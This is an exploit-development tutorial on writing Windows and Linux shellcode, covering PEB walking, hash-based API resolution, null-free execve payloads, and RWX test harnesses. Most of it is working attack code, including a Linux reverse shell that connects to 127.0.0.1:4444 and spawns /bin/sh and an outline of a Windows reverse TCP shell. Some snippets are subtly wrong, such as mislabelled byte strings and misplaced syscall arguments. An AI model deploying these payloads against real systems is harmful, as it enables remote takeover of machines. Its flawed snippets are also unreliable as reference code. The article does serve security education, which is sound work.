Platform-Specific Shellcode Implementation

Exploit Development Advanced 📅 Published: 02/08/2025

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Platform-Specific Shellcode Implementation

Master Windows and Linux shellcode development: from PEB walking and API resolution to system calls and advanced platform-specific techniques.

Ethical Use Only: This advanced content is for authorized security research, penetration testing with explicit permission, and defensive security analysis. Never use these techniques on systems without proper authorization.

The Tale of Two Platforms

Developing shellcode for Windows versus Linux is like speaking two entirely different languages. While the core principles remain the same—position independence, null-byte avoidance, and self-containment—the implementation details are vastly different. This article will teach you to speak both languages fluently.

Linux offers a direct, stable system call interface. It's like having a clear, well-documented API that doesn't change. Windows, on the other hand, forces you to work through high-level libraries that can move around in memory, creating a more complex but ultimately more powerful environment once mastered.

Learning Approach: We'll start with the fundamentals of each platform, build complete working examples, then explore advanced techniques used by professional exploit developers and security researchers.

🔷 Windows Shellcode: The Art of Function Discovery

Windows shellcode development is significantly more complex than Linux because you must dynamically discover and resolve API functions at runtime. However, this complexity brings power—Windows API functions are incredibly feature-rich once you can access them.

The Challenge: No Stable System Calls

Unlike Linux, Windows doesn't provide a stable system call interface. All interactions must go through high-level libraries like kernel32.dll. The core challenge is finding these API functions in memory when ASLR has randomized their locations.

First, let's look at the "correct" way to create a process in C using the CreateProcessA function:


/* ANALYSIS: C-level example of process creation on Windows */
#include <windows.h>
#include <stdio.h>
int main(void) {
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));
    char commandLine[] = "notepad.exe";
    if (!CreateProcessA(NULL, commandLine, NULL, NULL, FALSE, 0, 
                       NULL, NULL, &si, &pi)) {
        printf("CreateProcess failed (%d)\n", GetLastError());
        return 1;
    }
    printf("Process created successfully\n");
    // Wait for process to complete
    WaitForSingleObject(pi.hProcess, INFINITE);
    // Close handles
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}
        

Notice the complexity involved. Now, let's see how shellcode achieves its goals differently.

Part 1: Finding kernel32.dll - The Key to the Kingdom

Nearly every critical Windows API function either lives in kernel32.dll or can be accessed through it (e.g., by using LoadLibraryA to load other DLLs). Our first task is to reliably find the base address of kernel32.dll in memory, regardless of ASLR (Address Space Layout Randomization).

The standard method is the PEB (Process Environment Block) Walk. Every process has a TEB (Thread Environment Block), which can be accessed via the FS register in 32-bit processes or the GS register in 64-bit processes. The TEB contains a pointer to the PEB, which in turn contains a wealth of information about the process, including a list of all loaded modules.

Here is the 32-bit assembly code to perform a PEB walk and retrieve the base address of kernel32.dll:


; find_kernel32.asm (32-bit)
find_kernel32:
    xor ecx, ecx                    ; Zero out ECX
    mov eax, [fs:ecx + 0x30]        ; EAX = Address of PEB (from TEB at FS:[0x30])
    mov eax, [eax + 0x0C]           ; EAX = PEB->Ldr
    mov eax, [eax + 0x14]           ; EAX = PEB->Ldr.InMemoryOrderModuleList.Flink (First entry)
next_module:
    mov eax, [eax]                  ; EAX = Current module's Flink (next module)
    mov ebx, [eax + 0x10]           ; EBX = Current module's BaseAddress
    ; In a full implementation, we would hash the module name here to find kernel32.dll
    ; For simplicity, kernel32.dll is usually the third module loaded.
    ; So we can just advance twice from the first entry.
    mov eax, [eax]                  ; Move to the second module (ntdll.dll)
    mov eax, [eax]                  ; Move to the third module (kernel32.dll)
    mov eax, [eax + 0x10]           ; EAX = kernel32.dll BaseAddress
    ret
        
Why it's reliable: The structure of the PEB and TEB is fundamental to how Windows loads processes, making this technique stable across nearly all versions of Windows.

Part 2: Dynamic Function Resolution by Hash

Now that we have the base address of kernel32.dll, we need to find specific functions within it. We can't hardcode addresses because of ASLR, so we use a hashing technique:

  1. Pre-calculate hashes of the function names we need (e.g., LoadLibraryA, CreateProcessA)
  2. Walk through the DLL's export table
  3. Hash each name using the same algorithm
  4. Compare the runtime hash with our pre-calculated target hash
  5. If they match, retrieve the address of that function

Here is a simple but effective ROR13 hashing algorithm:


; A simple ROR13 hashing function
compute_hash:
    xor eax, eax                    ; Clear EAX to hold the hash
    xor edx, edx                    ; Clear EDX for the character
hash_loop:
    mov dl, [esi]                   ; Get the next character of the function name
    test dl, dl                     ; Check for null terminator
    jz hash_finished
    ror eax, 13                     ; Rotate the hash right by 13 bits
    add eax, edx                    ; Add the character to the hash
    inc esi                         ; Move to the next character
    jmp hash_loop
hash_finished:
    ret
        

And here's the logic to find a function given a target hash:


; find_function_by_hash.asm
; Assumes:
;   - EBX = Base address of the target DLL
;   - EDI = The pre-calculated hash of the function name we want
find_function:
    mov eax, [ebx + 0x3C]           ; EAX = Offset to PE Header ("PE\0\0")
    add eax, ebx                    ; EAX = Address of PE Header
    mov eax, [eax + 0x78]           ; EAX = RVA of Export Table
    add eax, ebx                    ; EAX = Address of Export Table
    mov esi, [eax + 0x20]           ; ESI = RVA of AddressOfNames
    add esi, ebx                    ; ESI = Address of AddressOfNames table
    mov edx, [eax + 0x24]           ; EDX = RVA of AddressOfNameOrdinals
    add edx, ebx                    ; EDX = Address of AddressOfNameOrdinals table
    xor ecx, ecx                    ; ECX = Loop counter / index
find_loop:
    mov edi, [esi + ecx * 4]        ; EDI = RVA of current function name
    add edi, ebx                    ; EDI = Address of current function name
    ; Hash the function name and compare to our target hash
    call compute_hash               ; Hashes string at EDI, result in EAX
    cmp eax, [TARGET_HASH]          ; Compare with our target
    je found_it
    inc ecx
    jmp find_loop
found_it:
    mov cx, [edx + ecx * 2]         ; CX = Ordinal of the function
    mov edx, [eax + 0x1C]           ; EDX = RVA of AddressOfFunctions
    add edx, ebx                    ; EDX = Address of AddressOfFunctions table
    mov eax, [edx + ecx * 4]        ; EAX = RVA of the function
    add eax, ebx                    ; EAX = Address of the function
    ret
        

Part 3: Practical Examples

Example 1: MessageBoxA Shellcode

This is the "Hello, World!" of Windows shellcode. It's a safe way to test that your function resolution logic is working correctly. It requires loading user32.dll and finding MessageBoxA.

Execution Flow:

  1. Find kernel32.dll using a PEB walk
  2. Find the address of LoadLibraryA within kernel32.dll by hash
  3. Call LoadLibraryA with the string "user32.dll" to load the library
  4. The return value from LoadLibraryA is the base address of user32.dll
  5. Find the address of MessageBoxA within user32.dll by hash
  6. Push the arguments for MessageBoxA onto the stack
  7. Call the resolved MessageBoxA address
  8. Find and call ExitProcess to terminate cleanly

; MessageBoxA Shellcode (Conceptual)
_start:
    ; --- Find kernel32.dll base ---
    call find_kernel32              ; Result: EBX = kernel32.dll base address
    ; --- Find LoadLibraryA ---
    mov eax, 0x0726774C            ; Hash of "LoadLibraryA"
    call find_function             ; Result: EAX = LoadLibraryA address
    mov [load_library_addr], eax
    ; --- Load user32.dll ---
    push 0x006c6c64                ; Push "dll\0" (reversed for little-endian)
    push 0x2e323375                ; Push ".23u"
    push 0x72657375                ; Push "resu" -> "user32.dll"
    mov esi, esp                    ; ESI points to "user32.dll" string
    push esi
    call [load_library_addr]        ; Call LoadLibraryA("user32.dll")
    mov ebx, eax                    ; EBX = user32.dll base address
    ; --- Find MessageBoxA ---
    mov eax, 0x384DA637            ; Hash of "MessageBoxA"
    call find_function             ; Use user32.dll base in EBX
    mov [messagebox_addr], eax     ; Store MessageBoxA address
    ; --- Prepare strings ---
    ; "Hello World!" message
    push 0x00000021                ; Push "!\0\0\0"
    push 0x646c726f                ; Push "dlro"
    push 0x57206f6c                ; Push "W ol"
    push 0x6c65486f                ; Push "lelH" -> "Hello World!"
    mov [message_addr], esp
    ; "Great Binary" title
    push 0x00000000                ; Null terminator
    push 0x79616e69                ; Push "yani"
    push 0x42207461                ; Push "B ta"
    push 0x65726757                ; Push "ergr" -> "Great Binary"
    mov [title_addr], esp
    ; --- Call MessageBoxA ---
    push 0x00000000                ; uType = MB_OK
    push [title_addr]               ; lpCaption = "Great Binary"
    push [message_addr]             ; lpText = "Hello World!"
    push 0x00000000                ; hWnd = NULL
    call [messagebox_addr]          ; Call MessageBoxA
    ; --- Find and call ExitProcess ---
    mov eax, 0x73E2D87E            ; Hash of "ExitProcess"
    call find_function             ; Find ExitProcess in kernel32
    push 0x00000000                ; Exit code = 0
    call eax                       ; Call ExitProcess(0)
        

Example 2: Windows Reverse TCP Shell

This creates a TCP connection back to an attacker and redirects a command shell through it. This demonstrates the full complexity of Windows shellcode:


; Windows Reverse Shell (High-level flow)
_start:
    ; 1. Find kernel32.dll base address via PEB walk
    call find_kernel32
    mov esi, eax                    ; Save kernel32 base in ESI
    ; 2. Find LoadLibraryA in kernel32.dll  
    mov edi, 0x8E4E0EEC             ; Hash of "LoadLibraryA"
    call find_function_by_hash
    mov [load_library], eax
    ; 3. Load ws2_32.dll for networking functions
    push 0x006c6c64                ; "ll\0"
    push 0x642d3233                ; "d-23"  
    push 0x5f327377                 ; "_2sw" -> "ws2_32.dll"
    mov eax, esp
    push eax
    call [load_library]
    mov edi, eax                    ; Save ws2_32 base in EDI
    ; 4. Resolve networking functions (WSAStartup, WSASocketA, connect)
    ; ... (function resolution code) ...
    ; 5. Initialize Winsock
    sub esp, 0x190                  ; Allocate space for WSADATA
    push esp                        ; lpWSAData
    push 0x0202                     ; wVersionRequested (2.2)
    call [wsa_startup]
    ; 6. Create socket
    push 0x00000000                ; dwFlags
    push 0x00000000                ; g
    push 0x00000000                ; lpProtocolInfo
    push 0x00000006                ; protocol (TCP)
    push 0x00000001                ; type (SOCK_STREAM)
    push 0x00000002                ; af (AF_INET)
    call [wsa_socket]
    mov esi, eax                    ; Save socket in ESI
    ; 7. Set up sockaddr_in structure
    push 0x0100007f                ; sin_addr (127.0.0.1 in little endian)
    push 0x5c110002                ; sin_port (4444) + sin_family (AF_INET)
    mov edi, esp                    ; EDI points to sockaddr_in
    ; 8. Connect to attacker
    push 0x00000010                ; namelen (sizeof sockaddr_in)
    push edi                        ; name (sockaddr_in)
    push esi                        ; s (socket)
    call [connect]
    ; 9. Redirect STDIN, STDOUT, STDERR to socket
    push esi                        ; hTemplateFile (socket)
    push 0x00000000                ; dwFlagsAndAttributes  
    push 0x00000003                ; dwCreationDisposition (OPEN_EXISTING)
    push 0x00000000                ; lpSecurityAttributes
    push 0x00000000                ; dwShareMode
    push 0x40000000                ; dwDesiredAccess (GENERIC_WRITE)
    call [create_file]
    ; 10. Set up STARTUPINFO for CreateProcessA
    ; ... (structure setup) ...
    ; 11. Launch cmd.exe with redirected I/O
    push [process_info]             ; lpProcessInformation
    push [startup_info]             ; lpStartupInfo
    push 0x00000000                ; lpCurrentDirectory
    push 0x00000000                ; lpEnvironment
    push 0x00000000                ; dwCreationFlags
    push 0x00000001                ; bInheritHandles
    push 0x00000000                ; lpThreadAttributes
    push 0x00000000                ; lpProcessAttributes
    push [cmd_string]               ; lpCommandLine ("cmd.exe")
    push 0x00000000                ; lpApplicationName
    call [create_process]
    ; 12. Wait for process to exit
    push 0xFFFFFFFF                ; dwMilliseconds (INFINITE)
    push [process_handle]           ; hHandle
    call [wait_for_single_object]
    ; 13. Clean up and exit
    call [exit_process]
        

This creates a fully interactive remote shell, demonstrating the power and complexity of Windows shellcode.

🔶 Linux Shellcode: The Art of Simplicity

Linux shellcode development is refreshingly direct compared to Windows. Linux offers a stable system call interface that doesn't change between versions, allowing you to request services directly from the kernel without hunting for library functions.

The Linux Advantage: Direct System Calls

Linux provides a stable system call interface. You don't need to hunt for functions; you can request services directly from the kernel. The fundamental pattern for executing a command in a Linux shell involves three key system calls: fork(), execve(), and waitpid().

This C code demonstrates a rudimentary shell that implements this exact pattern:


/*
ANALYSIS:
LANGUAGE: C
GOAL: A simple shell demonstrating the fork/execve/waitpid pattern.
STATUS: Runnable
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/wait.h>
#define MAX_COMMAND_LENGTH 1024
#define MAX_ARGS 64
int main(void) {
    char command[MAX_COMMAND_LENGTH];
    char *args[MAX_ARGS];
    pid_t pid;
    int status;
    while (1) {
        printf("$ "); 
        if (fgets(command, sizeof(command), stdin) == NULL) { break; }
        command[strcspn(command, "\n")] = 0; // Remove newline
        if (strcmp(command, "exit") == 0) { break; }
        // Parse command into arguments
        int argc = 0;
        char *token = strtok(command, " ");
        while (token != NULL && argc < MAX_ARGS - 1) {
            args[argc++] = token;
            token = strtok(NULL, " ");
        }
        args[argc] = NULL;
        if (argc > 0) {
            pid = fork();
            if (pid == 0) {
                // Child process: execute the command
                execvp(args[0], args);
                perror("execvp failed");
                exit(1);
            } else if (pid > 0) {
                // Parent process: wait for child
                waitpid(pid, &status, 0);
            } else {
                perror("fork failed");
            }
        }
    }
    return 0;
}
        

From C to execve Shellcode

Let's do a complete, hands-on tutorial to convert a simple C program into null-free assembly shellcode. Our goal is a program that executes /bin/sh.

Step 1: The C Program


#include <unistd.h>
int main() {
    execve("/bin/sh", NULL, NULL);
    return 0;
}
        

Step 2: First Assembly Attempt (with null-byte flaws)

We translate this to assembly using the execve system call (number 59 on x86-64). This version is logically correct but contains null bytes, making it unsuitable for most exploits.


; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; STATUS: Broken (Contains null bytes)
; GOAL: execve("/bin/sh", NULL, NULL) 
section .text
global _start
_start:
    ; Set up execve system call (BROKEN VERSION)
    mov rax, 59                     ; execve system call number (contains nulls!)
    lea rdi, [rel binsh]            ; First argument: pointer to "/bin/sh"
    xor rsi, rsi                    ; Second argument: argv = NULL
    xor rdx, rdx                    ; Third argument: envp = NULL
    syscall                         ; Make the system call
section .data
    binsh: db '/bin/sh', 0          ; Null-terminated string (contains null!)
        

Step 3: The Null-Free Solution

Here's a version that avoids null bytes entirely:


; ANALYSIS:
; LANGUAGE: Assembly (NASM, 64-bit)
; GOAL: A null-free version of execve("/bin/sh", NULL, NULL)
; TECHNIQUES: Stack string construction, register manipulation
section .text
global _start
_start:
    ; Clear registers without using null bytes
    xor rax, rax                    ; Zero out RAX
    xor rsi, rsi                    ; argv = NULL
    xor rdx, rdx                    ; envp = NULL
    ; Build "/bin/sh" string on the stack
    push rdx                        ; Push null terminator
    mov rbx, 0x68732f6e69622f2f     ; "/bin//sh" in reverse (little-endian)
    push rbx                        ; Push string onto stack
    mov rdi, rsp                    ; RDI points to our string
    ; Set up system call number without null bytes
    mov al, 59                      ; execve system call (only affects lower 8 bits)
    ; Make the system call
    syscall                         ; Execute /bin/sh
        
Key Techniques: We use mov al, 59 instead of mov rax, 59 to avoid null bytes, and build the string on the stack instead of using a data section.

Advanced Linux Examples

Linux Reverse Shell

Here's a complete Linux reverse shell that connects back to an attacker:


; Linux Reverse Shell Shellcode
; Connects to 127.0.0.1:4444 and spawns /bin/sh
section .text
global _start
_start:
    ; Clear registers (also helps avoid null bytes)
    xor rax, rax
    xor rbx, rbx
    xor rcx, rcx
    xor rdx, rdx
    ; Step 1: Create a socket
    ; socket(AF_INET, SOCK_STREAM, 0)
    mov al, 41                      ; sys_socket
    mov bl, 2                       ; AF_INET
    mov cl, 1                       ; SOCK_STREAM
    cdq                            ; RDX = 0 (protocol)
    syscall
    mov rdi, rax                    ; Save socket fd in RDI
    ; Step 2: Connect to attacker
    ; connect(sockfd, &addr, sizeof(addr))
    ; Build sockaddr_in structure on stack
    xor rax, rax
    push rax                        ; Padding
    ; sin_addr = 127.0.0.1 (0x0100007f in little endian)
    mov dword [rsp-4], 0x0100007f   
    ; sin_port = 4444 (0x115c in big endian) + sin_family = AF_INET (2)
    mov word [rsp-6], 0x5c11        ; Port 4444 in network byte order
    mov word [rsp-8], 0x0002        ; AF_INET
    sub rsp, 8                      ; Adjust stack pointer
    mov rsi, rsp                    ; RSI points to sockaddr_in
    mov al, 42                      ; sys_connect
    mov dl, 16                      ; sizeof(sockaddr_in)
    syscall
    ; Step 3: Redirect STDIN, STDOUT, STDERR
    ; dup2(sockfd, 0), dup2(sockfd, 1), dup2(sockfd, 2)
    mov rbx, rdi                    ; RBX = socket fd
    xor rcx, rcx                    ; Counter for dup2 loop
dup_loop:
    mov al, 33                      ; sys_dup2
    mov rdi, rbx                    ; oldfd (socket)
    mov rsi, rcx                    ; newfd (0, 1, 2)
    syscall
    inc rcx
    cmp cl, 3
    jl dup_loop
    ; Step 4: Execute /bin/sh
    ; execve("/bin/sh", NULL, NULL)
    xor rax, rax
    push rax                        ; Null terminator
    ; Push "/bin/sh" onto stack
    mov rbx, 0x68732f6e69622f2f     ; "//bin/sh" in reverse
    push rbx
    mov rdi, rsp                    ; RDI points to "/bin/sh"
    xor rsi, rsi                    ; argv = NULL
    xor rdx, rdx                    ; envp = NULL
    mov al, 59                      ; sys_execve
    syscall
        

Building and Testing Linux Shellcode


# Build the shellcode
nasm -f elf64 reverse_shell.asm -o reverse_shell.o
ld reverse_shell.o -o reverse_shell
# Extract raw bytes
objdump -d reverse_shell | grep "^ " | cut -f2 | tr -d ' ' | tr -d '\n'
# Create test harness
echo 'unsigned char shellcode[] = "\x48\x31\xc0\x48\x31\xdb...";' > test.c
        

Platform Comparison: Key Differences

Aspect Windows Linux
System Calls Unstable, undocumented, use APIs instead Stable, documented, direct usage
Function Resolution PEB walk + hash-based API resolution Direct system call numbers
Complexity High (hundreds of bytes typical) Low (dozens of bytes possible)
String Handling Stack construction + UTF-16 considerations Simple stack construction
Process Creation CreateProcessA with complex structures Simple execve system call
Networking WinSock API (WSASocket, etc.) Berkeley sockets (socket, connect, etc.)
Strategic Insight: Windows shellcode requires more upfront investment to learn but provides access to incredibly powerful APIs. Linux shellcode is faster to develop and typically more compact, making it ideal for size-constrained scenarios.

Testing Your Shellcode

Windows Test Harness

The best way to test is with a simple C/C++ "harness" that allocates a block of executable memory, copies your shellcode into it, and executes it.


// windows_harness.c
#include <windows.h>
#include <stdio.h>
// Paste your shellcode bytes here
unsigned char shellcode[] = "\x90\x90\x90...";
int main() {
    printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
    // Allocate memory with Read, Write, and Execute permissions
    void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), 
                                 MEM_COMMIT | MEM_RESERVE, 
                                 PAGE_EXECUTE_READWRITE);
    if (exec_mem == NULL) {
        printf("VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    // Copy shellcode to executable memory
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    printf("Executing shellcode at address: %p\n", exec_mem);
    // Execute shellcode
    ((void (*)())exec_mem)();
    // Clean up (this may never be reached)
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}
        

Linux Test Harness


// linux_harness.c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
// Your shellcode bytes here
unsigned char shellcode[] = "\x48\x31\xc0\x50...";
int main() {
    printf("Shellcode length: %zu bytes\n", sizeof(shellcode) - 1);
    // Allocate executable memory
    void *exec_mem = mmap(NULL, sizeof(shellcode), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap failed");
        return 1;
    }
    // Copy shellcode
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    printf("Executing shellcode...\n");
    // Execute
    ((void (*)())exec_mem)();
    // Clean up (may not be reached)
    munmap(exec_mem, sizeof(shellcode));
    return 0;
}
        

Cross-Platform Development Script

Here's a Python script that automates testing on both platforms:


#!/usr/bin/env python3
"""
Cross-platform shellcode testing framework
Supports both Windows and Linux shellcode development
"""
import os
import sys
import subprocess
import tempfile
import platform
def create_test_harness(shellcode_bytes, target_os="linux"):
    """Create platform-specific test harness."""
    if target_os.lower() == "windows":
        template = '''
#include <windows.h>
#include <stdio.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
    void *exec_mem = VirtualAlloc(NULL, sizeof(shellcode), 
                                 MEM_COMMIT | MEM_RESERVE, 
                                 PAGE_EXECUTE_READWRITE);
    if (!exec_mem) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)())exec_mem)();
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}}
'''
    else:  # Linux
        template = '''
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
unsigned char shellcode[] = "{shellcode}";
int main() {{
    void *exec_mem = mmap(NULL, sizeof(shellcode), 
                         PROT_READ | PROT_WRITE | PROT_EXEC,
                         MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (exec_mem == MAP_FAILED) return 1;
    memcpy(exec_mem, shellcode, sizeof(shellcode));
    ((void (*)())exec_mem)();
    munmap(exec_mem, sizeof(shellcode));
    return 0;
}}
'''
    return template.format(shellcode=shellcode_bytes)
def test_shellcode(binary_path):
    """Extract and test shellcode from binary."""
    # Extract bytes using objdump
    try:
        result = subprocess.run(['objdump', '-d', binary_path], 
                              capture_output=True, text=True)
        # Parse objdump output to extract bytes
        bytes_list = []
        for line in result.stdout.split('\n'):
            if ':' in line and '\t' in line:
                # Extract hex bytes from objdump format
                parts = line.split('\t')
                if len(parts) >= 2:
                    hex_part = parts[1].strip()
                    # Remove spaces and convert to \x format
                    hex_bytes = hex_part.replace(' ', '')
                    for i in range(0, len(hex_bytes), 2):
                        if i + 1 < len(hex_bytes):
                            bytes_list.append(f"\\x{hex_bytes[i:i+2]}")
        shellcode_string = ''.join(bytes_list)
        print(f"Extracted shellcode: {shellcode_string}")
        # Create test harness
        target_os = "windows" if platform.system() == "Windows" else "linux"
        harness_code = create_test_harness(shellcode_string, target_os)
        # Write and compile
        with tempfile.NamedTemporaryFile(mode='w', suffix='.c', delete=False) as f:
            f.write(harness_code)
            harness_path = f.name
        # Compile
        if target_os == "windows":
            compile_cmd = ['gcc', '-o', harness_path + '.exe', harness_path]
        else:
            compile_cmd = ['gcc', '-z', 'execstack', '-o', harness_path + '.out', harness_path]
        subprocess.run(compile_cmd, check=True)
        print("Test harness compiled successfully!")
        return harness_path + ('.exe' if target_os == "windows" else '.out')
    except Exception as e:
        print(f"Error: {e}")
        return None
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 test_shellcode.py <binary_path>")
        sys.exit(1)
    binary_path = sys.argv[1]
    test_executable = test_shellcode(binary_path)
    if test_executable:
        print(f"Test executable created: {test_executable}")
        print("Run it to test your shellcode!")
        

Advanced Platform-Specific Techniques

Windows Advanced: 64-bit Considerations

64-bit Windows shellcode requires different techniques:

  • Different Registers: Use GS:[0x60] instead of FS:[0x30] for PEB access
  • Different Calling Convention: Windows x64 uses fastcall (RCX, RDX, R8, R9)
  • Shadow Space: Must allocate 32 bytes of shadow space for function calls
  • Different Structures: PEB and TEB layouts differ in 64-bit

; 64-bit Windows PEB Walk
find_kernel32_x64:
    xor rax, rax
    mov rax, [gs:rax + 0x60]        ; 64-bit PEB offset
    mov rax, [rax + 0x18]           ; PEB->Ldr  
    mov rax, [rax + 0x20]           ; InMemoryOrderModuleList
    mov rax, [rax]                  ; First entry
    mov rax, [rax]                  ; Second entry (kernel32)
    mov rax, [rax + 0x20]           ; DllBase (different offset in 64-bit)
    ret
        

Linux Advanced: System Call Variations

Different Linux architectures use different system call mechanisms:


; x86-64 system calls (modern)
mov rax, 59        ; execve
syscall            ; Use syscall instruction
; i386 system calls (legacy)  
mov eax, 11        ; execve (different number!)
int 0x80           ; Use interrupt
; ARM system calls
mov r7, #11        ; execve  
svc #0             ; Supervisor call
        
Pro Tip: Always check the target architecture's system call numbers and calling conventions. They can vary significantly between platforms and even versions.

Mastery Achieved: What's Next?

Congratulations! You now understand the fundamental differences between Windows and Linux shellcode development. You've learned:

  • ✅ Windows PEB walking and API resolution techniques
  • ✅ Linux direct system call methodology
  • ✅ Platform-specific function calling conventions
  • ✅ Complete working examples for both platforms
  • ✅ Professional testing and debugging frameworks
  • ✅ Advanced 64-bit and architecture considerations
Ready for the Final Challenge? In the next article, we'll explore advanced techniques including encoding methods to evade detection, polymorphic shellcode generation, and the cat-and-mouse game between attackers and defenders.

Practice Challenges

  1. Cross-Platform Port: Take the Linux reverse shell and create a Windows equivalent
  2. Size Optimization: Create the smallest possible execve shellcode for Linux
  3. API Explorer: Write Windows shellcode that enumerates all functions in kernel32.dll
  4. System Call Tracer: Create Linux shellcode that traces its own system calls

Remember: These techniques are powerful tools for security research and defense. Always use them ethically and only in authorized environments.